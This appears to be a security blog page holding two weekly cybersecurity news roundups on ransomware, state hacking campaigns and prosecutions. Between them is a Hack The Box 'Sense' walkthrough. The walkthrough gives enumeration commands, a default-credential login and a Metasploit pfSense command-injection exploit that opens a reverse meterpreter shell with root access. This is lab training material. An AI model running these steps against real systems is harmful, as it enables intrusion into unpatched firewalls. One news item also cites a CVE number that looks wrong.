CyberChannel: Week of 6/22/25

REvil Hackers Walk Free After Serving Carding Sentences

Several members of the REvil ransomware group have been released by Russia after serving time for charges related to carding and malware distribution. Four individuals were released after their sentences were considered served during their pre-trial detention. Meanwhile, four other members received prison sentences ranging from 4.5 to 6 years after refusing to plead guilty. REvil, also known as Sodin and Sodinokibi, was a prominent ransomware group that emerged in 2019, but its operations were significantly disrupted following the 2021 Kaseya supply chain attack, which led to international law enforcement actions and arrests in both the U.S. and Russia. However, cybersecurity communication channels between the U.S. and Russia ceased after Russia's invasion of Ukraine.

DHS Warns of Increased Iranian Cyberattack Threats 

The U.S. Department of Homeland Security (DHS) recently issued a National Terrorism Advisory System bulletin, highlighting escalating Iranian cyber attack risks. This warning underscores a "heightened threat environment" in the United States, with potential "low-level" cyber attacks targeting U.S. networks from Iran-backed hacking groups and pro-Iranian hacktivists. The DHS also cautions against the mobilization of violent extremists. This advisory follows previous Iranian government cyber attacks on U.S. infrastructure and a recent alert from U.S., Canadian, and Australian authorities regarding Iranian hackers acting as initial access brokers. Notably, the state-sponsored Iranian group Br0k3r (also known as Pioneer Kitten) sells initial access to breached networks. This crucial cybersecurity warning likely stems from recent U.S. actions against Iranian nuclear facilities, prompting threats of "everlasting consequences" from Iran.

Canadian Telecom Hacked: Salt Typhoon Exploits Cisco Flaw 

The Chinese state-sponsored hacking group 'Salt Typhoon' successfully breached a Canadian telecommunication firm in February 2025. This sophisticated cyberattack leveraged an unpatched, critical Cisco IOS XE vulnerability (CVE-2023-20198), enabling the threat actors to create administrative accounts and achieve elevated privileges. With this access, 'Salt Typhoon' retrieved and modified configuration files, subsequently establishing a GRE tunnel for illicit traffic collection. Both the Canadian Centre for Cyber Security and the FBI have confirmed this incident. As 'Salt Typhoon' continues its reconnaissance and targeting across various critical sectors, urgent calls are being made for organizations, particularly telecommunication providers, to strengthen their network defenses against persistent state-sponsored espionage.

Russian APT28 Group Leverages Signal for Ukraine Cyberattacks 

Russian state-sponsored hacking group APT28 (UAC-0001) is exploiting Signal chats to launch sophisticated malware attacks targeting Ukrainian government entities. These attacks deploy novel malware families, BeardShell and SlimAgent, delivered via malicious documents in Signal messages. While not a Signal vulnerability, this method leverages the platform's popularity for phishing. The campaign involves a backdoor named Covenant, which loads BeardShell for PowerShell script execution and data exfiltration, alongside the SlimAgent screenshot grabber. This highlights APT28's ongoing cyberespionage efforts against Ukraine and Western nations. Organizations should monitor for these advanced persistent threats.

New FileFix Attack Leverages File Explorer for Covert PowerShell Commands

A new social engineering threat, the "FileFix attack," is emerging, weaponizing Windows File Explorer to execute stealthy PowerShell commands. Developed by cybersecurity researcher mr.d0x, this variant of the "ClickFix" technique deceives users on phishing pages. Victims are tricked into clicking an "Open File Explorer" button, which copies a malicious PowerShell command to their clipboard. By using a clever concatenation with a dummy file path and PowerShell comments, attackers conceal the malicious code within File Explorer's address bar. This simple yet effective cyber attack method, leveraging a common Windows utility, is anticipated to be rapidly adopted by threat actors for malware deployment, mirroring the success of prior ClickFix campaigns by groups like North Korea's 'Kimsuky'. Businesses should be aware of this evolving social engineering tactic. 

Malicious npm Packages: North Korea's Latest Supply Chain Attack Uncovered 

A sophisticated supply chain attack, directly linked to North Korea and dubbed the "Contagious Interview" operation, is actively distributing 35 highly malicious npm packages. Cybersecurity researchers at Socket recently uncovered these packages, which have already garnered over 4,000 downloads, signifying a significant threat to the developer community. The attack's initial phase involves a hex-encoded loader, HexEval, gathering host intelligence. This loader then deploys BeaverTail, a JavaScript-based data stealer, followed by the InvisibleFerret Python backdoor, enabling comprehensive data exfiltration, keylogging, and remote control capabilities over compromised systems.

This state-sponsored cyber espionage campaign meticulously targets developers through elaborate social engineering tactics. Attackers leverage fake recruiter profiles on platforms like LinkedIn, enticing victims with fraudulent coding assignments embedded within projects on GitHub or Bitbucket. Developers are then persuaded to execute these projects in non-sandboxed environments during simulated interview processes, bypassing typical cybersecurity defenses. This multi-stage APT attack showcases an evolving and well-resourced adversary, blending advanced malware delivery, OSINT-driven targeting, and deceptive social engineering to infiltrate trusted development ecosystems for cryptocurrency theft and sensitive data exfiltration.

British National "IntelBroker" Faces US Charges for $25 Million Data Breaches 

British national Kai West, known prominently as "IntelBroker," faces U.S. charges for global data theft breaches, incurring an estimated $25 million in cybercrime damages. The 25-year-old is accused of stealing and illicitly selling sensitive data, including health records and internal files, from a broad range of victims, including government agencies, major corporations, and critical infrastructure, frequently leveraging the BreachForums hacking forum. IntelBroker's alleged activities are linked to high-profile cyberattacks against entities like Europol, General Electric, AMD, and HPE. West's indictment includes conspiracy to commit computer intrusions and wire fraud, with the FBI confirming his identity via Bitcoin transaction tracing. Arrested in France in February 2025, the U.S. is seeking extradition to New York for this significant cybercriminal. 

"Security Consultant" Pleads Guilty to Hacking Clients He Sought 

Nicholas Michael Kloster, a 32-year-old from Kansas City, has pleaded guilty to hacking multiple organizations, including a health club and a Missouri nonprofit, in a scheme to promote his cybersecurity services. Kloster's methods involved breaching networks, then contacting victims to detail his unauthorized access to systems like security cameras and router settings, subsequently offering his services. He also admitted to stealing sensitive data, installing VPNs on compromised networks, and acquiring hacking tools using stolen credit card information. This case highlights the significant legal repercussions for individuals engaging in unauthorized network access; Kloster now faces a potential five-year federal prison sentence, a substantial fine, and restitution for his cybercrime activities.

Ahold Delhaize Hacked: 2.2 Million Records Exposed in Ransomware Attack 

Food retail giant Ahold Delhaize recently confirmed a data breach impacting over 2.2 million individuals. This ransomware attack, occurring in November 2024, led to the compromise of personal, financial, and health data from its U.S. systems. The stolen information includes names, contact details, dates of birth, government IDs, and financial records. While Ahold Delhaize, operating major brands like Food Lion and Stop & Shop, hasn't officially named the perpetrators, the INC Ransom ransomware group claimed responsibility, leaking alleged stolen documents. This highlights the ongoing threat of cybersecurity attacks on major retailers and the importance of data security. 

HTB: Sense

 ___  ___  _________  ________                         
|\  \|\  \|\___   ___\\   __  \  ___                   
\ \  \\\  \|___ \  \_\ \  \|\ /_|\__\                  
 \ \   __  \   \ \  \ \ \   __  \|__|                  
  \ \  \ \  \   \ \  \ \ \  \|\  \  ___                
   \ \__\ \__\   \ \__\ \ \_______\|\__\               
    \|__|\|__|    \|__|  \|_______|\|__|               
 ________  _______   ________   ________  _______      
|\   ____\|\  ___ \ |\   ___  \|\   ____\|\  ___ \     
\ \  \___|\ \   __/|\ \  \\ \  \ \  \___|\ \   __/|    
 \ \_____  \ \  \_|/_\ \  \\ \  \ \_____  \ \  \_|/__  
  \|____|\  \ \  \_|\ \ \  \\ \  \|____|\  \ \  \_|\ \ 
    ____\_\  \ \_______\ \__\\ \__\____\_\  \ \_______\
   |\_________\|_______|\|__| \|__|\_________\|_______|
   \|_________|                   \|_________|         
                                                            

Hack The Box's Sense is an Easy OpenBSD machine that features pfSense, an open-source firewall software. This machine uses basic directory brute-forcing using Gobuster to search for a user credential text file to gain access to the firewall, followed by an injection attack to gain root access to the machine.

Once starting the machine on HTB and connecting to your HTB VPN, we will start by opening our terminal and pinging the machine's IP address to make sure the network is up. Make sure the IP address you enter matches the one displayed on HTB when you boot up the target machine.

ping 10.10.10.60

You should receive responses from the IP address. You can press CTRL + C to stop sending packets to the target host. Once confirming the network is up and running, it's time to move to enumeration using Nmap.

Start by doing a quick service scan using Nmap. We will use the -sV switch to enable version detection. You can learn more about Nmap here.

nmap -sV 10.10.10.60
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-02 11:17 CDT
Nmap scan report for 10.10.10.60
Host is up (0.0091s latency).
Not shown: 998 filtered tcp ports (no-response)
PORT    STATE SERVICE    VERSION
80/tcp  open  http       lighttpd 1.4.35
443/tcp open  ssl/https?

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.98 seconds

We can see a web server running. Let's navigate to the site by entering the target's ip address in our web browser. Upon inspection we can see a login page for pfSense, an open-source firewall software based in FreeBSD. We can complete a quick Google search for the default credentials for pfSense and find the default username is "admin" and the password is "pfsense". When trying these default credentials, we are notified they are not correct. Let's move on to using Gobuster to brute-force directories on the server. We'll search for .php and .txt files using the directory-list-2.3-medium.txt wordlist.

gobuster dir -u https://10.10.10.60/ -t 50 -x php,txt -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -k
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     https://10.10.10.60/
[+] Method:                  GET
[+] Threads:                 50
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              php,txt
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/index.php            (Status: 200) [Size: 6690]
/help.php             (Status: 200) [Size: 6689]
/themes               (Status: 301) [Size: 0] [--> https://10.10.10.60/themes/]
/stats.php            (Status: 200) [Size: 6690]
/css                  (Status: 301) [Size: 0] [--> https://10.10.10.60/css/]
/edit.php             (Status: 200) [Size: 6689]
/includes             (Status: 301) [Size: 0] [--> https://10.10.10.60/includes/]
/license.php          (Status: 200) [Size: 6692]
/system.php           (Status: 200) [Size: 6691]
/status.php           (Status: 200) [Size: 6691]
/javascript           (Status: 301) [Size: 0] [--> https://10.10.10.60/javascript/]
/changelog.txt        (Status: 200) [Size: 271]
/classes              (Status: 301) [Size: 0] [--> https://10.10.10.60/classes/]
/exec.php             (Status: 200) [Size: 6689]
/widgets              (Status: 301) [Size: 0] [--> https://10.10.10.60/widgets/]
/graph.php            (Status: 200) [Size: 6690]
/tree                 (Status: 301) [Size: 0] [--> https://10.10.10.60/tree/]
/wizard.php           (Status: 200) [Size: 6691]
/shortcuts            (Status: 301) [Size: 0] [--> https://10.10.10.60/shortcuts/]
/pkg.php              (Status: 200) [Size: 6688]
/installer            (Status: 301) [Size: 0] [--> https://10.10.10.60/installer/]
/wizards              (Status: 301) [Size: 0] [--> https://10.10.10.60/wizards/]
/xmlrpc.php           (Status: 200) [Size: 384]
/reboot.php           (Status: 200) [Size: 6691]
/interfaces.php       (Status: 200) [Size: 6695]
/csrf                 (Status: 301) [Size: 0] [--> https://10.10.10.60/csrf/]
/system-users.txt     (Status: 200) [Size: 106]
/filebrowser          (Status: 301) [Size: 0] [--> https://10.10.10.60/filebrowser/]

After some time, we will notice a /systems-users.txt, highlighted above in orange. This file is interesting because there could be user login information within the text file. We can view this file by navigating to the path on the web server by using our web browser. On my spawned HTB machine it would be https://10.10.10.60/system-users.txt. We get the following page with a support ticket containing credentials:

####Support ticket###

Please create the following user


username: Rohit
password: company defaults

We see the username listed as "Rohit" and the password as "company defaults". After testing these credentials on the pfSense login page, we see we are not granted access. But let's try the default pfSense password, "pfsense". Upon using these credentials we see we are granted access!

Let's fire-up Metasploit and search for potential exploits for pfSense:

msfconsole
Metasploit tip: To save all commands executed since start up to a file, use the 
makerc command
                                                  
 _                                                    _
/ \    /\         __                         _   __  /_/ __
| |\  / | _____   \ \           ___   _____ | | /  \ _   \ \
| | \/| | | ___\ |- -|   /\    / __\ | -__/ | || | || | |- -|
|_|   | | | _|__  | |_  / -\ __\ \   | |    | | \__/| |  | |_
      |/  |____/  \___\/ /\ \\___/   \/     \__|    |_\  \___\


       =[ metasploit v6.3.44-dev                          ]
+ -- --=[ 2376 exploits - 1232 auxiliary - 416 post       ]
+ -- --=[ 1391 payloads - 46 encoders - 11 nops           ]
+ -- --=[ 9 evasion                                       ]

Metasploit Documentation: https://docs.metasploit.com/

[msf](Jobs:0 Agents:0) >> search pfsense

Matching Modules
================

   #  Name                                            Disclosure Date  Rank       Check  Description
   -  ----                                            ---------------  ----       -----  -----------
   0  exploit/unix/http/pfsense_clickjacking          2017-11-21       normal     No     Clickjacking Vulnerability In CSRF Error Page pfSense
   1  exploit/unix/http/pfsense_diag_routes_webshell  2022-02-23       excellent  Yes    pfSense Diag Routes Web Shell Upload
   2  exploit/unix/http/pfsense_config_data_exec      2023-03-18       excellent  Yes    pfSense Restore RRD Data Command Injection
   3  exploit/unix/http/pfsense_graph_injection_exec  2016-04-18       excellent  No     pfSense authenticated graph status RCE
   4  exploit/unix/http/pfsense_group_member_exec     2017-11-06       excellent  Yes    pfSense authenticated group member RCE
   5  exploit/unix/http/pfsense_pfblockerng_webshell  2022-09-05       great      Yes    pfSense plugin pfBlockerNG unauthenticated RCE as root


Interact with a module by name or index. For example info 5, use 5 or use exploit/unix/http/pfsense_pfblockerng_webshell

[msf](Jobs:0 Agents:0) >> 

We see option #3 shows a module for an injection attack granting authentication. You can read more about this specific exploit on Rapid7's website here. Let's select this attack and fill out the required exploit options:

use 3
[*] Using configured payload php/meterpreter/reverse_tcp
[msf](Jobs:0 Agents:0) exploit(unix/http/pfsense_graph_injection_exec) >> options

Module options (exploit/unix/http/pfsense_graph_injection_exec):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   PASSWORD  pfsense          yes       Password to login with
   Proxies                    no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                     yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit
                                        /basics/using-metasploit.html
   RPORT     443              yes       The target port (TCP)
   SSL       true             no        Negotiate SSL/TLS for outgoing connections
   USERNAME  admin            yes       User to login with
   VHOST                      no        HTTP server virtual host


Payload options (php/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic Target



View the full module info with the info, or info -d command.

[msf](Jobs:0 Agents:0) exploit(unix/http/pfsense_graph_injection_exec) >> set RHOSTS 10.10.10.60
RHOSTS => 10.10.10.60
[msf](Jobs:0 Agents:0) exploit(unix/http/pfsense_graph_injection_exec) >> set USERNAME rohit
USERNAME => rohit
[msf](Jobs:0 Agents:0) exploit(unix/http/pfsense_graph_injection_exec) >> set LHOST tun0
LHOST => 10.10.14.6
[msf](Jobs:0 Agents:0) exploit(unix/http/pfsense_graph_injection_exec) >> 

We set the RHOSTS to the target ip address, the USERNAME to "rohit", and the LHOST to our desired listening ip address for the reverse TCP connection. We can now run this exploit using "exploit":

exploit

[*] Started reverse TCP handler on 10.10.14.6:4444 
[*] Detected pfSense 2.1.3-RELEASE, uploading intial payload
[*] Payload uploaded successfully, executing
[*] Sending stage (39927 bytes) to 10.10.10.60
[+] Deleted uz
[*] Meterpreter session 1 opened (10.10.14.6:4444 -> 10.10.10.60:53021) at 2024-10-02 12:06:53 -0500

(Meterpreter 1)(/var/db/rrd) > getuid
Server username: root
(Meterpreter 1)(/var/db/rrd) > 

Once the reverse TCP connection is successful, we can use the "getuid" command to see we now have root access to the machine! You can now navigate through the target system to obtain the root and user .txt flags.

CyberChannel: Week of 9/29/24

CUPS Vulnerability Could Amplify DDoS Attacks by 600 Times

A recently patched vulnerability in the Common Unix Printing System (CUPS) has emerged as a potential tool for cyber criminals. This flaw can be exploited to launch Distributed Denial-of-Service (DDoS) attacks with a significant amplification factor of 600 times. This means attackers can use a small amount of traffic to overwhelm a targeted server with a much larger volume, making it inaccessible to legitimate users.

Researchers discovered that chaining this CUPS flaw with three other vulnerabilities could potentially allow remote code execution on Unix-like systems. However, the primary concern lies in its DDoS amplification capabilities. Thankfully, patches are available to address this issue. System administrators are urged to update their CUPS installations to mitigate the risk and prevent their servers from being used in DDoS attacks.

"Pig Butchering" Apps Preying on App Store Users

"Pig butchering" scams have been discovered on both the Google Play Store and Apple's App Store. These fraudulent trading apps lure victims with promises of high returns on fake cryptocurrencies. Once users invest, their funds are stolen by the scammers. It's important to be cautious when downloading investment apps and to research the developer and user reviews before investing any money.

To avoid falling victim to these scams, users should be wary of unsolicited investment offers. It's also important to verify the legitimacy of the trading platform and the cryptocurrency before investing. Additionally, users should never share their personal or financial information with strangers.

Cloudflare Blocks 3.8 Tbps DDoS Attack, Setting New Record

Cloudflare, a web security company, recently thwarted a record-breaking distributed denial-of-service (DDoS) attack. The attack peaked at a staggering 3.8 terabits per second (Tbps) and lasted for 65 seconds. The attackers launched the attack by exploiting a network of vulnerable devices, including Asus routers and Mikrotik systems. This attack is the largest publicly recorded DDoS attack ever observed.

In comparison to previous large-scale DDoS attacks, this attack stands out due to its volume and duration. DDoS attacks work by overwhelming a target server with traffic, making it unavailable to legitimate users.

Evasive Linux Malware Enables Widespread Cryptomining

A stealthy malware campaign targeting Linux servers for years has finally come to light. The malware, dubbed "perfctl," has likely infected millions of servers and caused significant disruption. Researchers believe perfctl has been active for at least three years, exploiting vulnerabilities in Polkit (CVE-2021-4043) to escalate privileges and install cryptomining software.

Perfctl is particularly dangerous due to its evasive tactics. It avoids detection by stopping its activities when a new user logs in, only resuming once the user becomes idle again. Additionally, it deletes its own binary after execution, further enhancing its stealth. This highlights the importance of keeping systems updated and implementing strong security measures to protect against evolving cyber threats like perfctl.

FIN7 Targets Users with Deepfake Nude Generators to Spread Malware

There is a new tactic used by FIN7 hackers to spread malware. FIN7 is a cybercrime group known for sophisticated phishing and social engineering attacks. In this new campaign, FIN7 is creating fake AI-powered deepnude generator sites. These sites are designed to lure people interested in generating nude images using deepfakes. When users try to download the generated images, they are unknowingly downloading malware instead.

This is not the first time FIN7 has used social engineering to spread malware. FIN7 has been distributing NetSupport RAT and other malware through similar tactics. NetSupport RAT is a remote access trojan that allows attackers to take control of infected devices.

UMC Health System Impacted by Ransomware, Patients Diverted

The UMC Health System in Texas was recently impacted by a ransomware attack. This disrupted their IT infrastructure, forcing them to take critical measures to contain the incident. While their facilities remained open, some emergency and non-emergency patients had to be diverted to other locations.

UMC took immediate action to disconnect their systems and launched an investigation. As of now, no major ransomware group has claimed responsibility for the attack. This incident highlights the potential consequences of cyberattacks on critical infrastructure like healthcare systems. The disruption caused by the attack emphasizes the importance of robust cybersecurity measures in protecting patient care and hospital operations.

LockBit Ransomware Gang Hit with Global Crackdown

In a global effort to crack down on the LockBit ransomware gang, law enforcement from twelve countries have joined forces. This resulted in the arrest of four individuals connected to the cyber criminal group. These arrests included a developer, a bulletproof hosting service administrator, and two others associated with LockBit activity.

The operation not only involved arrests but also the seizure of LockBit infrastructure and the release of a decryption tool. This tool allows victims to recover their encrypted files for free. Additionally, authorities issued indictments targeting other LockBit affiliates and offered a substantial reward for information leading to the capture of the gang's leadership. These actions demonstrate international cooperation in combating ransomware threats and potentially offer relief to victims of LockBit attacks.

Hacker Steals Confidential Data for Profit

A British citizen, Robert B. Westbrook, has been charged by the U.S. Securities and Exchange Commission (SEC) for hacking into the computer systems of five public American companies. His goal was to access confidential earnings information before it was made public.

Westbrook allegedly used this stolen information to make profitable stock trades ahead of earnings announcements. Over a period of 18 months, between January 2019 and August 2020, he made an estimated $3.75 million in illegal profits through insider trading. The SEC alleges that Westbrook reset the passwords of senior executives to gain access to documents and emails containing financial reports. He then used anonymous email accounts, VPN services, and Bitcoin to conceal his identity while making the illicit investments. However, the SEC was eventually able to track him down using data analytics.